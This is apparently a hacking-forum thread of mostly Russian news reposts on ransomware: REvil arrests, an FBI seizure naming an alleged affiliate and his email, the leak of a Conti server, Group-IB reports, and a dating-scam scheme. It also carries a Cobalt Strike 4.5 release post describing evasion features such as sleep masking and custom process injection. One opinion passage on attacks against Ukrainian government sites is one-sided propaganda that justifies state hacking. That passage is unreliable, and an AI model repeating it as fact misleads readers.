По мнению администрации США, к атаке на Colonial Pipeline был причастен как минимум один из задержанных участников хакерской группировки.
Участник задержанной ФСБ хакерской группировки REvil взламывал американский трубопровод Colonial Pipeline, сообщила представительница Белого дома на спецбрифинге для журналистов.
"Мы полагаем, что один из тех, кто был задержан сегодня (в пятницу), несет ответственность за атаку на Colonial Pipeline прошлой весной", - отметила она.
"Мы стремимся к тому, чтобы те, кто совершает атаки на американцев с помощью вирусов-вымогателей, предстали перед судом", - подчеркнула представитель исполнительной власти США, назвав действия российских правоохранительных органов "очень важными шагами".
Члены преступного сообщества действовали в Москве, Санкт-Петербурге, Московской, Ленинградской и Липецкой областях. Полный состав преступлений и причастность к ним членов банды уже установлена. Хакеры занимались кражей денег с помощью вредоносного ПО. В пятницу стало известно об их задержании .
Напомним, что в мае 2021 года крупнейшая топливная трубопроводная компания США подверглась хакерской атаке. Предположительно, с применением программы- вымогателя. Атаку приписывали организации DarkSide.
• Source: reuters.com/technology/russia-arrests-dismantles-revil-hacking- group-us-request-report-2022-01-14
Последствия хакерской атаки на государственные сайты Украины породили занятную разноголосицу обвинений и версий. Так как обычно все подобное на Украине списывают на «российскую гибридную агрессию» и всевозможные «планы Шатуны», то практически сразу после взлома государственных ресурсов последовали дежурные заявления о том, что это российские хакеры снова цинично напали на Украину.
Но уже на следующий день последовало переобувание в прыжке, и в атаке на государственные сайты Украины обвинили хакеров из группировки «UNC1151», которая «связана с правительством Белоруссии или ее силовыми структурами, читай КГБ Белоруссии». Данные обвинения связаны с прошлогодним американским докладом, где утверждалось, что данная хакерская группировка непосредственно связана с вооруженными силами Белоруссии, которые с ее помощью якобы уже давно ведут в сети пропаганду, направленную против НАТО. Что важно, в том же докладе утверждалось, что американцы искали следы, указывающие на связь «UNC1151» с Россией, но доказательств такой связи обнаружить не удалось.
Важно понимать, что с 2014 года украинский сегмент интернета перенасыщен действиями хакерских групп. Это могут быть хакеры, связанные с Россией, Белоруссией, США, странами НАТО, причем тут важно помнить историю с хакерскими операциями под фальшивым флагом, которые разоблачил беглый аналитик АНБ Сноуден, нынче скрывающийся в России.
Кроме того, добавьте сюда действия спецслужб ДНР и ЛНР, оппозиционные украинские хакерские группы, криминальные хакерские группы и т.п. Все это в сумме приводит к тому, что за исключением тех случаев, когда сами хакеры берут на себя ответственность за те или иные действия (как, например, «Киберберкут», «Джокер ДНР» или «Берегини»), зачастую просто невозможно установить, кто конкретно стоял за той или иной утечкой информации или тем или иным актом саботажа сетевой инфраструктуры. Это равновероятно могут быть действия каких- то хакеров, связанных с государством или спецслужбами, какая-то операция под фальшивым флагом, имитирующая атаку аффилированных с государством хакеров, или же просто криминальные действия, которые также могут маскироваться под «политику и безопасность».
При этом борьба с утечками и атаками регулярно саботируется изнутри гос. аппарата и спецслужб, так как регулярно мы видим истории с «арестом шпионов», продажей государственных баз данных и документов, халатным отношением к вопросам обеспечения сетевой безопасности. Поэтому уже много лет в сеть все кому не лень сливают разнообразные документы, от документов бригад ВСУ на Донбассе и списка пациентов психушек для военных до закрытых документов СНБО и НАТО.
В случае с атаками на государственные сайты это уже давно является рутиной противостояния ДНР и ЛНР с Украиной, отражая работу спецслужб по ведению кибервойны как составного элементы обычной горячей войны, которая продолжается на Донбассе с 2014-го года.
Если мы говорим о Белоруссии, которую сейчас обвиняет Украина, то стоит помнить, что до августа 2020-го года Белоруссия была нейтральной страной, которая последовательно поддерживала свой нейтралитет и на территории которой проходили переговоры в Минском формате. После начала попытки государственного переворота 2020-го года Украина активно включилась в поддержку сил, которые стремились устранить Лукашенко и установить в Минске прозападное антироссийское правительство.
В этот период, помимо прочего, на государственные сайты Белоруссии осуществлялись регулярные хакерские атаки, в том числе и с территории Украины. Целью этих атак была парализация работы государственных сайтов и затруднение работы сетевой работы государственного аппарата. Разумеется, все это выдавалось за «действия возмущенных хакеров-демократов». Последующие утечки прекрасно показали, что речь шла именно о государственной кампании воздействия.
Этими и другими шагами Украина последовательно, с августа 2020-го года, лепила из Белоруссии враждебное себе государство, хотя Белоруссия не предпринимала ничего явно враждебного в отношении Украины. В Киеве это, разумеется, понимали, но следовали в фарватере западного курса в отношении Белоруссии, который выражался в непризнании режима Лукашенко и последовательном давлении на него с целью смены власти в Белоруссии.
Белоруссия некоторое время терпела все это, но постепенно начала менять свою политику в отношении Украины, начав наконец-то называть вещи своими именами, поминая в том числе фактическую установку нацистского режима на Украине и полную его зависимость от Запада. Риторика Минска все чаще начала склоняться к российским оценкам происходящего на Украине, хотя в период активной многовекторности Лукашенко официальный Минск таких оценок избегал.
Спустя 1,5 года после тех событий набрался уже достаточно широкий список заявлений и действий со стороны Украины, чтобы Белоруссия могла себе позволить «хакерский привет», напоминающий, что у враждебных действий Украины могут быть неприятные последствия для самой Украины. Это не значит, что именно Белоруссия стоит за хакерской атакой на украинские сайты (столь же легко можно бездоказательно предположить, что это операция американских хакеров под фальшивым флагом, имитирующая действия белорусских или российских хакеров), но нетрудно оправдать такие действия, если Белоруссия действительно имела хоть какое-то к ним отношения, так как Украина проводит активную и деятельную анти- белорусскую политику, а Лукашенко не из тех, кто подставляет вторую щеку. Важно помнить, что до евромайдана и до попыток свержения Лукашенко никакие белорусские хакеры украинские сайты почему-то не атаковали.
Проблемы начались после государственного переворота и установления в Киеве марионеточного режима, который и является катализатором нестабильности в регионе, и проблем с безопасностью, в том числе и сетевой.
Posted on [December 14, 2021](https://www.cobaltstrike.com/blog/cobalt- strike-4-5-fork-run-youre-history/) by Greg Darwin
Cobalt Strike 4.5 is now available. This release sees new options for process
injection, updates to the sleep mask and UDRL kits,
evasion improvements and a command history update along with other, smaller
changes.
Before getting into the details of the release, I just wanted to impress upon
you how seriously we take product security.
We dedicated a significant portion of this release to improving controls
around product licensing.
We are fully committed to improving the security of the product and will
continue to make product security enhancements a priority in future releases.
Until now, Cobalt Strike’s only [process
injection](https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-
the-details-cobalt-strike/) option was the built-in fork&run technique. While
this is good for stability,
it limits OPSEC options. We have added two new Aggressor Script hooks
(PROCESS_INJECT_SPAWN and PROCESS_INJECT_EXPLICIT) to allow you to
define how the fork&run and
explicit injection techniques are implemented when executing post exploitation
commands. A new BOF along with an Aggressor Script function implements both of
these new techniques.
You will now have the option of using the built-in fork&run technique or
creating your own process injection technique.
Since adding the [reconnect button](https://www.cobaltstrike.com/blog/cobalt-
strike-4-4-the-one-with-the-reconnect-button/) in the 4.4 release, the new
number one change request relates to issues with command history.
There was an outstanding issue whereby scrolling back through your command
history and then running a new command would insert
that command in the wrong place in the command history. Not only did we fix
that, we also overhauled command history to make it much more usable.
We have added a “history” command that displays your command history.
You can choose to display all commands in the command history (“ history all
”) or specify how many commands that you want to display
(for example, “ history 10 ”). Is that all? No! We’ve also made working with
command history more Unix-like by adding support for bang (!) characters.
This release also sees the addition of a complementary strategy to the
existing Host Rotation Strategy.
The “max retry” strategy is available for HTTP, HTTPS and DNS Beacons and it
allows you to tell a Beacon to exit after a
specified failure count. As failure count crosses a threshold, the sleep time
is adjusted to a specified value.
The strategy comes with a number of default values for exit and sleep
thresholds but you will be able to add custom
values with a new Aggressor hook (LISTENER_MAX_RETRY_STRATEGIES).
The Sleep Mask kit was introduced in [Cobalt Strike
4.4](https://www.cobaltstrike.com/blog/cobalt-strike-4-4-the-one-with-the-
reconnect-button/). There are two changes to the sleep mask kit in this
release.
Firstly, following user feedback, we have increased available space from 289
to 769 bytes. Secondly, we have added support to the kit for masking heap
memory.
Like the Sleep Mask kit, the User Defined Reflective Loader kit was introduced
in [Cobalt Strike 4.4](https://www.cobaltstrike.com/blog/cobalt-
strike-4-4-the-one-with-the-reconnect-button/). Following user feedback,
we have increased the reserved size in Beacon for a larger User Defined
Reflective Loader. A new Aggressor hook (BEACON_DLL_SIZE)
allows you to specify whether to reserve 5k (the current threshold) or 100k
for your custom loader.
One final, small update to mention is that to save you a click, the x64
checkbox is now checked by default on all payload generation dialogs.
Please be aware of this change so that you don’t rely on muscle memory when
working with those dialogs and accidentally uncheck that checkbox!
Unrelated to this release, but still relevant, is a change to the
documentation. Earlier this month we made some [changes to the Cobalt Strike
infrastructure](https://www.cobaltstrike.com/blog/cobalt-strike-
infrastructure-changes/).
One of those changes was an overhaul of the Cobalt Strike website, and the
manual is now searchable: https://cobaltstrike.com/support.
Please note that you may need to refresh your browser cache to see the new
documentation.
We will be publishing follow-up blog posts that provide much more detail on
most of these changes in the next few days, so please keep your eye on the
blog for those updates.
To see a full list of what’s new in Cobalt Strike 4.5, please check out the
release notes. Licensed users
can run the [version 4.4 update program](https://www.cobaltstrike.com/help-
update-cobalt-strike) to get version 4.5.
If you have not yet updated to version 4.4, you will need download from the
website. To purchase Cobalt Strike or ask about
evaluation options, please contact us
for more information.
Хакер взломал сети и украл конфиденциальную информацию у известных компаний по всему миру.
Румынские правоохранительные органы арестовали партнера вымогательской группировки, подозреваемого во взломе сетей и краже конфиденциальной информации у нескольких известных компаний по всему миру, включая крупную румынскую IT-компанию.
41-летний гражданин Румынии был арестован в своем доме в Крайове (Румыния) сотрудниками Румынского управления по расследованию организованной преступности и терроризма совместно с сотрудниками судебной полиции по подозрению в несанкционированном доступе к компьютерным системам, передаче компьютерных данных, незаконном перехвате компьютерной передачи и шантаже.
«Подозреваемому с помощью различных методов удалось получить доступ к компьютерным сетям некоторых компаний в Румынии и в других государствах, откуда он похитил большие объемы данных. Подозреваемый затем потребовал крупный выкуп в криптовалюте и пригрозил утечкой украденных данных на хакерских форумах, если его требования не будут выполнены», — сообщили в ведомстве.
В настоящее время неизвестно, с какой группировкой вымогателей работал подозреваемый.
source: diicot.ro/mass-media/3382-comunicat-de-presa-13-12-2021
Согласно судебным документам, с которыми ознакомился BleepingComputer, в августе ФБР изъяло 2,3 миллиона долларов у известного филиала по вымогательству REvil и GandCrab.
В опубликованной сегодня жалобе ФБР изъяло из кошелька Exodus 3 августа 2021
года 39,89138522 биткойна на сумму примерно 2,3 миллиона долларов по текущим
ценам (1,5 миллиона долларов на момент изъятия).
Exodus - это настольный или мобильный кошелек, который владельцы могут
использовать для хранения криптовалюты, включая биткойны, Ethereum, Solana и
многие другие.
ФБР не сообщает, как они получили доступ к кошельку, кроме того, что он
находится у них на хранении, указывая, что они, вероятно, получили доступ к
закрытому ключу кошелька или секретной кодовой фразе.
"Соединенные Штаты Америки подают эту подтвержденную жалобу in rem на 39,89138522 биткойнов, изъятых из кошелька Exodus (" собственность ответчика "), который в настоящее время находится и находится на хранении и под управлением Далласского отделения Федерального бюро расследований (" ФБР "), One Justice Way, Даллас, Техас ", - говорится в [жалобе](https://translate.google.com/website?sl=auto&tl=ru&u=https://www.documentcloud.org/documents/21120139-govuscourts22million- ransom-seizure) Соединенных Штатов [на конфискацию имущества](https://translate.google.com/website?sl=auto&tl=ru&u=https://www.documentcloud.org/documents/21120139-govuscourts22million- ransom-seizure) .
Далее в жалобе говорится, что кошелек содержал выкуп REvil, принадлежащий аффилированному лицу, идентифицированному как «Александр Сикерин, а / к / а Александр Сикерин, а / к / а Александр Сикерин» с адресом электронной почты'engfog1337@gmail.com . '
Хотя ФБР не указывает онлайн-псевдоним злоумышленника, имя engfog в адресе электронной почты связано с хорошо известным филиалом GandCrab и REvil / Sodinokibi, известным как Lalartu.
Организации GandCrab и REvil работали как программа-вымогатель как услуга (RaaS), где основные операторы сотрудничают со сторонними хакерами, известными как аффилированные лица.
В рамках этой договоренности основные операторы будут разрабатывать и управлять программным обеспечением для шифрования / дешифрования, платежным порталом и сайтами утечки данных. Перед филиалами стоят задачи взлома корпоративных сетей, кражи данных и развертывания программ-вымогателей для шифрования устройств.
Любые выплаты выкупа затем будут разделены между аффилированным и основным операторами, при этом операторы обычно получают 20-30% выкупа, а аффилированные лица - остальное.
В [отчете REvil McAfee](https://translate.google.com/website?sl=auto&tl=ru&u=https://www.mcafee.com/blogs/other- blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a- service-follow-the-money/) исследователи проследили за денежным следом известного злоумышленника, известного как Lalartu, аффилированного лица операций с программами-вымогателями GandCrab и REvil.
В 2019 году злоумышленник опубликовал на русскоязычном хакерском форуме
сообщение о том, что он работал с GandCrab и переключился на REvil после
закрытия [предыдущей операции](https://www-bleepingcomputer-
com.translate.goog/news/security/gandcrab-ransomware-shutting-down-after-
claiming-to-earn-2-billion/?_x_tr_sl=auto&_x_tr_tl=ru&_x_tr_hl=en-US) .
После того, как отчет был опубликован, исследователь безопасности Алон Гал
попытался [выяснить настоящую личность
Лаларту](https://translate.google.com/website?sl=auto&tl=ru&u=https://underthebreach.com/f/tracking-
down-revils-lalartu-by-utilizing-multiple-osint-metho) .
В рамках своего исследования Гал отследил Лаларту по псевдонимам «Engfog» или «Eng_Fog», что соответствует адресу электронной почты engfog1337@gmail.com, указанному в жалобе ФБР.
После дальнейших разговоров с исследователями безопасности BleepingComputer подтвердил, что Лаларту был идентифицирован как «Александр Сикерин», имя которого указано в жалобе.
В ноябре Министерство юстиции объявило, что [ФБР конфисковало выкуп](https://www-bleepingcomputer-com.translate.goog/news/security/us- seizes-6-million-from-revil-ransomware-arrest-kaseya- hacker/?_x_tr_sl=auto&_x_tr_tl=ru&_x_tr_hl=en-US) на [сумму 6 миллионов долларов,](https://www-bleepingcomputer-com.translate.goog/news/security/us- seizes-6-million-from-revil-ransomware-arrest-kaseya- hacker/?_x_tr_sl=auto&_x_tr_tl=ru&_x_tr_hl=en-US) уплаченный банде вымогателей REvil.
Неясно, являются ли эти 2,3 миллиона долларов частью ранее объявленной суммы или дополнительными выкупами, конфискованными ФБР.
Продолжающаяся стратегия правоохранительных органов по подрыву экономики и партнерских систем операций с программами-вымогателями приносит свои плоды.
Эта деятельность привела к многочисленным арестам и разрушениям инфраструктуры, в том числе:
Аресты и захват инфраструктуры также заставляют банды вымогателей прекратить свои операции, в том числе [REvil в октябре](https://www-bleepingcomputer- com.translate.goog/news/security/blackmatter-ransomware-claims-to-be-shutting- down-due-to-police-pressure/?_x_tr_sl=auto&_x_tr_tl=ru&_x_tr_hl=en-US) и [BlackMatter в июле](https://www-bleepingcomputer- com.translate.goog/news/security/blackmatter-ransomware-claims-to-be-shutting- down-due-to-police-pressure/?_x_tr_sl=auto&_x_tr_tl=ru&_x_tr_hl=en-US) .
https://www.bleepingcomputer[.]com/...affiliate-of-revil-gandcrab-ransomware- gangs/
Исследователи безопасности опубликовали в открытом доступе данные сервера, где Conti ведет переговоры с жертвами.
Кибервымогательская группировка Conti стала жертвой утечки данных после того, как исследователям безопасности удалось установить реальный IP-адрес одного из ее самых важных серверов и более месяца сохранять консольный доступ к системе.
Взломанный сервер (так называемый платежный портал или сайт восстановления) представляет собой место, где Conti обсуждает со своими жертвами вопрос уплаты выкупа.
«Наша команда обнаружила уязвимость в используемых Conti серверах восстановления и использовала ее для определения реальных IP-адресов скрытого сервиса, размещенного на сайте восстановления», - сообщается в 37-страничном отчете швейцарской ИБ-компании Prodaft.
Речь идет об IP-адресе 217.12.204.135, принадлежащем украинской хостинговой компании ITL LLC. В течение месяца специалисты Prodaft имели доступ к этому серверу, что дало им возможность осуществлять мониторинг сетевого трафика.
Хотя большинство подключений к серверу относятся к жертвам Conti, специалисты также фиксировали SSH-соединения, судя по всему, относящиеся к самой Conti. Однако здесь удача была не на стороне исследователей, так как SSH IP-адреса принадлежали выходным узлам Tor. Другими словами, с их помощью нельзя было идентифицировать операторов Conti.
Другая представленная в отчете ценная информация также включает сведения об ОС сервера Conti и его файле htpasswd, содержащем хешированный пароль для доступа к серверу.
После публикации отчет сразу же привлек внимание группировки. В особенности ее обеспокоила публикация IP-адреса сервера и хеша пароля для доступа к нему, поскольку этими сведениями могли воспользоваться конкурирующие с Conti вымогательские группировки. В итоге ей пришлось отключить свой платежный портал, чтобы найти новый хостинг, из-за чего жертвы по всему миру не могли связаться с вымогателями и были вынуждены страдать от продолжительного простоя.
Исследователи передали все свои находки правоохранительным органам. Однако публикация их в открытом доступе – дело редкое. Как правило, такие подробности не предаются огласке, чтобы у правоохранительных органов было время принять соответствующие меры, на что иногда уходят многие месяцы. Действия исследователей также раскритиковали другие ИБ-эксперты, ведь они привели к тому, что Conti усилила свою безопасность.
source: prodaft.com/resource/detail/conti-ransomware-group-depth-analysis
Компания Group-IB [составила список](https://www.group- ib.ru/whitepapers/ransomware-in- russia-2021.html?utm_source=press_release&utm_campaign=ransomware-white- paper&utm_medium=organic&utm_content=ransomware-2021) самых агрессивных программ-вымогателей, которые в 2020-2021 годах работали на территории России. Ими оказались операторы шифровальщиков Dharma, Crylock, Thanos — каждый из них совершил более 100 атак на российский бизнес.
Всего в уходящем году количество атак программ-вымогателей в России увеличилось более чем на 200%, а максимальная запрошенная сумма выкупа составила 250 млн рублей.
Еще в марте текущего года эксперты прогнозировали, что волна шифровальщиков в 2021 году докатится и до России. По данным Лаборатории компьютерной криминалистики Group-IB, количество атак на организации на территории страны увеличилось в 2021 году более чем на 200%. Наиболее активными стали операторы вымогателей Dharma, Crylock и Thanos — в общей сложности на них приходится более 300 атак.
[](https://xakep.ru/wp- content/uploads/2021/11/365846/pic-45-2x.jpg)
Как и во всем мире, в России одной из основных причин популярности программ- вымогателей стала партнерская модель Ransomware-as-a-Service («Вымогательство как услуга») — именно так работают Dharma, Crylock и Thanos. Другие группы, как например, русскоязычная RTM, ранее специализировавшаяся на хищениях из систем дистанционного банковского обслуживания (ДБО), сами добавили в свой арсенал программы-вымогатели, чтобы в случае неудачи с кражей денег, развернуть шифровальщик на всю скомпрометированную сеть.
Суммы выкупа, которые злоумышленники требуют от своих жертв в России, зависят как от величины бизнеса, так и аппетитов самих атакующих. Средняя сумма выплаченного выкупа составляет 3 млн рублей, максимальная — 40 млн рублей.
Рекорд по максимальной сумме запрашиваемого выкупа в 2021 году поставила группировка OldGremlin — они рассчитывали получить от жертвы 250 млн рублей. Для сравнения в мире «ставки» значительно выше — вымогатели из Hive не так давно потребовали от немецкого холдинга MediaMarkt выкуп в размере 240 млн долларов.
Однако исследователи отмечают, что в России есть своя специфика: отсутствие информации об успешных атаках шифровальщиков и их жертвах объясняется тем, что вымогатели не использует публичные сайты для публикации данных компаний, которые отказались платить выкуп, и не выставляют украденную информацию на аукционах. Да и сами пострадавшие всеми силами стараются избежать огласки.
Наиболее популярным способом проникновения шифровальщиков в сети российских организаций является компрометация публично доступных терминальных серверов по протоколу RDP. В текущем году на них пришлось до 60% всех кибератак. Чаще других подобным способом в инфраструктуру компаний проникали участники партнерских программ Dharma и Crylock.
На фишинговые рассылки, где первичным вектором атаки стала электронная почта, проходится 22% инцидентов — этот тренд в 2021 году добрался и до России. К примеру, экспертами Group-IB была обнаружена группа Rat Forest, которая получала первоначальный доступ в корпоративные сети именно через фишинговые рассылки.
[](https://xakep.ru/wp- content/uploads/2021/11/365846/pic-44.jpg)
Интересно, что в своих атаках хакеры из Rat Forest использовали абсолютно легитимное программное обеспечение для удаленного доступа — RMS или TeamViewer, а вместо шифровальщика — криптоконтейнер VeraCrypt, куда перемещали важные для жертв данные и требовали выкуп. В некоторых случаях он достигал 1 млн рублей.
Уязвимости в публично доступных приложениях также стали причиной многих успешных атак шифровальщиков в России в 2021 году — на них проходится 14% инцидентов. К примеру, довольно старая уязвимость в VPN-серверах Fortigate (CVE-2018-13379) до сих пор остается актуальной и критически опасной для многих российских компаний. В одном из инцидентов, который расследовала Group- IB, атакующие воспользовались подобной уязвимостью и получили доступ в корпоративную сеть организации. После этого они применили встроенное в операционную систему средство шифрования дисков — BitLocker, и запросили выкуп за расшифровку размере 20 млн рублей.
«Несмотря на распространенное заблуждение о том, что операторы программ- вымогателей “не работают по РУ”, русскоговорящие группы и их партнеры в 2020-2021 годах активно атаковали российский бизнес. К сожалению, общий уровень кибербезопасности российских организаций остается крайне невысоким — его едва ли достаточно для противостояния даже низкоквалифицированным вымогателям. Зачастую методы атакующих настолько просты, что часть атак можно было бы предотвратить, например, настроив только мультифакторную аутентификацию», — говорит Олег Скулкин, руководитель Лаборатории компьютерной криминалистики Group-IB.
Click to expand...
источник https://xakep.ru
PS:
crylock
ваши комментарии ?
Group-IB, обнаружила более 700 доменов фейковых сайтов театров, стендап-шоу, ресторанов, кинотеатров, которые мошенники используют для кражи денег под видом приглашения на свидание. За последние три года схему Fake Date (фальшивое свидание — с англ.) взяли на вооружение два десятка преступных групп — выручка одной из них за год составила более 18 миллионов рублей.
От «антикино» к «антитеатру»
Первые случаи использования в России схемы Fake Date с приглашением на фейковые свидания в «антикино»— кинотеатр с залами для двоих — специалисты Group-IB фиксировали еще в 2018 году после обращений обманутых любителей романтики. Однако расцвет этой интернет-аферы пришелся на период, связанный с пандемией коронавируса, то есть 2020 год и первую половину-2021 года.
Для сравнения: если в 2019 году под схему Fake Date было зарегистрировано всего 25 фишинговых сайтов, то в 2020 году их было уже 263, а в 2021 году — 428 доменов. В этом году самым популярным «местом для свидания» у мошенников оказались театры и стендап-шоу (60%). Чуть менее раскрученные локации — фейковые рестораны, СПА и кальянные (35%). А вот тема с «антикино» после того, как ее подробно описали исследователи Group-IB, практически себя изжила. На нее приходится менее 5%.
Независимо от места для романтической встречи сценарий обмана выглядит примерно одинаковым: симпатичная «девушка» знакомится в сервисах Tinder, Badoo или в соцсетях с молодым человеком, быстро переводит диалог в мессенджер (обычно, Telegram) и сама приглашает его на свидание. Как бы случайно у «девушки» оказывается билет на спектакль или выступление звезды стендап-шоу. Она отправляет QR-код своего билета и предлагает выкупить место рядом с ней. После чего скидывает ссылку на сайт, где этот билет можно приобрести. Молодой человек оплачивает «билет» — теряет деньги, а «девушка» добавляет его номер в блэклист и больше не выходит на связь.
«Работая по схеме Fake Date, мошенники, как правило, предварительно пытаются узнать интересы своего собеседника, составить его психологически портрет и, исходя из этого, предлагают ту или иную наживку, в том числе исходя из платежеспособности жертвы, — рассказывает замглавы департамента CERT-GIB Ярослав Каргалев. — Исследуя эту схему, мы встречались с самыми различными ее модификациями. В некоторых из них жертве приходилось платить трижды: за свой билет, за билет для «подружки» и при попытке оформления возврата».
След от «Мамонта»
Всего эксперты CERT-GIB насчитали как минимум 24 команды мошенников, работающих по схеме Fake Date, причем их количество растет из года в год. Так, в 2019 году — 2 группы, 2020 году — 7 групп, 2021 году — 15 групп. Правда, не все из них уже действующие. В ходе исследования аналитики обнаружили связи доменных имен фишинговых сайтов из схемы Fake Date с ресурсами из популярной схемы «Курьер» (или «Мамонт»), нацеленной на кражу денег и данных банковских карт пользователей с помощью фейковых сайтов популярных курьерских служб и маркетплейсов. Более того, в некоторых случаях сайты были зарегистрированы одними и теми ж людьми.
Любопытно, что схема Fake Date практически полностью переняла у «Мамонта» иерархию, техническую базу, модель функционирования и даже слэнг («мамонтом» на языке мошенников называют жертву). Вся работа рядовых участников, так называемых «воркеров», координируется через Telegram, где созданы специальные чат-боты с готовыми фишинговыми сайтами под различные площадки — кинотеатры, театры, рестораны, кальянные, с уже настроенной генерацией билетов, чеков, подробными скриптами для переписки с жертвой. Для продвинутых скамеров налажена продажа «под ключ» записанных от лица девушек «голосовушек» — аудио и видео сообщений с приглашением на свидание. Кроме того, существуют отдельные Telegram-каналы с информацией о выплатах и чаты для общения «воркеров».
Согласно данным одного из скам-проектов, его выручка за год составила более 18 млн рублей при более чем 7 000 транзакций. Похищенные деньги поступают на банковские карты или кошельки «админов», которые выплачивают «воркерам» процент (от 70 до 80%) от каждой транзакции. При оплате жертвой «возврата», часть суммы получает еще и «прозвонщик» из технической поддержки, который «ведет» клиента.
• Source: https://www.group-ib.ru/media/fake-date/
Агентство Bloomberg назвало башню «Федерация Восток» в «Москве-Сити» центром обналичивания криптовалют у кибервымогателей.
Влиятельное издание Bloomberg обнаружило в российском квартале небоскрёбов целое гнездо хакеров. По мнению журналистов, в высотках Москвы-Сити снимают офисы «около пятидесяти» фирм, которые с 2018 года вовлечены в грязные операции с криптовалютами.
«Хотя в этом нет ничего противозаконного, такие фирмы могут позволять злоумышленникам обналичивать прибыль от цифровых преступлений, если не будут бдительно следить за своими клиентами», — сообщает источник.
Также было отмечено, что слабый контроль за деятельностью таких компаний может не создает препятствий для преступной деятельности злоумышленников. Так, Bloomberg со ссылкой на Минфин США убеждает, что в «Востоке» находится не менее четырех фирм, которые замешаны в отмывании денег, полученных посредством программ-вымогателей.
Среди других упоминаемых в публикации компаний — EggChange, CashBank и Buy- bitcoin.pro. Последняя, по информации Chainalysis, обработала сотни тысяч долларов в виде криптовалютных средств вымогателей и других лиц, включая работающих с даркнет-рынком Hydra.
source: bloomberg.com/news/articles/2021-11-03/bitcoin-money-laundering- happening-in-moscow-s-vostok-tower-experts-say
Минюст США обещает аресты киберпреступников в ближайшие недели
Министерство юстиции США в ближайшее время произведет больше арестов и других операций в рамках активизации деятельности по борьбе с киберпреступностью на территории страны, заявила в четверг заместитель генпрокурора США Лиза Монако.
«Мы не собираемся останавливаться. Мы продолжим стремиться привлечь к ответственности тех, кто намерен преследовать наши отрасли, захватывать их данные и угрожать экономической безопасности, национальной безопасности и частной безопасности», – отметила Монако.
Говоря о ситуации с кибератаками, проводимыми с территории России, замгенпрокурора заявила, что США пока не видят там «существенных изменений».
Государственный департамент США объявляет о предложении вознаграждения в размере до 10 000 000 долларов за информацию, позволяющую установить личность или местонахождение любого человека (лиц), занимающего ключевую руководящую позицию в транснациональной организованной преступной группе, являющейся разновидностью программы-вымогателя DarkSide. Кроме того, Департамент также предлагает вознаграждение в размере до 5 000 000 долларов США за информацию, ведущую к аресту и / или осуждению в любой стране любого лица, участвовавшего в сговоре с целью участия или попытки участия в инциденте с программным вымогательством DarkSide.
Группа вымогателей DarkSide была ответственна за инцидент с программой- вымогателем Colonial Pipeline Company в мае 2021 года, который привел к решению компании проактивно и временно закрыть 5500-мильный трубопровод, по которому транспортируется 45 процентов топлива, используемого на восточном побережье США. . Предлагая эту награду, Соединенные Штаты демонстрируют свою приверженность защите жертв программ-вымогателей по всему миру от эксплуатации киберпреступниками. Соединенные Штаты обращаются к странам, укрывающим преступников-вымогателей, которые готовы восстановить справедливость в отношении компаний-жертв и организаций, пострадавших от программ-вымогателей.
Эта награда предоставляется в рамках Программы вознаграждения за транснациональную организованную преступность (TOCRP) Государственного департамента.
Департамент управляет TOCRP в тесной координации с нашими партнерами из федеральных правоохранительных органов в рамках общих усилий правительства по пресечению и ликвидации транснациональной организованной преступности во всем мире, включая киберпреступность. С 1986 года более 75 транснациональных преступников и крупных торговцев наркотиками были привлечены к ответственности в соответствии с TOCRP и Программой вознаграждений за наркотики (NRP). На сегодняшний день Департамент выплатил более 135 миллионов долларов в качестве вознаграждения.
Для получения дополнительной информации о вариантах программ-вымогателей, перечисленных выше, а также о TOCRP и NRP, пожалуйста, ознакомьтесь с программой государственного департамента INL AntiCrime Rewards Programme .

Conspirators to Justice - United States Department of State ](https://www.state.gov/reward-offers-for-information-to-bring-darkside- ransomware-variant-co-conspirators-to-justice/)
We're offering rewards totaling $15M for info leading to identification, arrest, and/or conviction of key leaders of DarkSide ransomware or incidents.
 www.state.gov
Хакеры взломали большую украинскую сеть аптек "Аптека низьких цін" (АНЦ). Работу сайта аптеки заблокировали и требуют выкуп.
Об этом APnews сообщает со ссылкой на заявление генерального директора холдинга аптечной сети Николая Щербины.
По его словам, злоумышленники отправили ему сообщение, в котором обещали вернуть доступ к маршрутизаторам в обмен на выкуп. Однако, гендиректор подчеркнул, что платить хакерам никто не будет, а виновных уже ищут.
"Группа профессиональных хакеров-вымогателей взломала систему информационной защиты компании, заблокировала работу сайта, вырубила Интернет в аптеках и предложила заплатить выкуп за возможность продолжить работу. (…) Моя принципиальная позиция, позиция моих коллег и акционеров - даже несмотря на понесенные и возможные убытки, не вести каких-либо переговоров с кибертеррористами и, тем более, не платить им, ведь это по сути укрепляет их "бизнес" и открывает возможности для новых атак. Напротив, мы сейчас делаем все возможное для поимки преступников и привлечения их к ответственности", - сообщил Щербина.
Он добавил, что сейчас ведутся работы над восстановлением инфраструктуры, это может занять несколько дней. А в более чем в 1000 аптек предстоит доставить и настроить новые маршрутизаторы.
Представители 30 стран, собравшиеся в Белом Доме в Вашингтоне на международный форум по кибербезопасности, подготовили совместное заявление(whitehouse.gov/briefing-room/statements-releases/2021/10/14/joint- statement-of-the-ministers-and-representatives-from-the-counter-ransomware- initiative-meeting-october-2021/) с призывом усилить регулирование виртуальных финансов, чтобы противодействовать вымогателям шифровальщикам. При этом в документе никак не упоминаются криптовалюты, хотя, вероятно, они и имеются в виду.
В заявлении говорится, что программы-вымогатели представляют значительную опасность для общественной безопасности, потребителей услуг и важной инфраструктуры. Эта проблема носит комплексный и глобальный характер и требует совместного реагирования разных стран. Поэтому представители государств сообщили о планах международного сотрудничества для противодействия такому вымогательству.
Соглашение подразумевает совместные действия по подрыву бизнес-моделей вымогателей, в том числе работа по регулированию виртуальных финансов — именно они используются в качестве основного инструмента злоумышленниками. При этом в документе никак не упоминаются криптовалюты, однако, как пишет(theregister.com/2021/10/15/ransomware_summit_cryptocurrency_crackdown/) Register, очевидно, что они являются целью усиленного регулирования, поскольку зачастую такие программы-вымогатели требуют платежи именно в криптовалюте.
Представители стран в заявлении возлагают возросшие объёмы вымогательства на государства, которые не следовали стандартам Группы разработки финансовых мер борьбы с отмыванием денег. Эта группа была учреждена G7 при участии Европейской комиссии и призвана защищать глобальную финансовую систему от её использования для отмывания денег и финансирования терроризма. Невыполнение положений этого органа привело к появлению удобной для злоумышленников среды, в которой они могут беспрепятственно перемещать денежные средства, в том числе виртуальные.
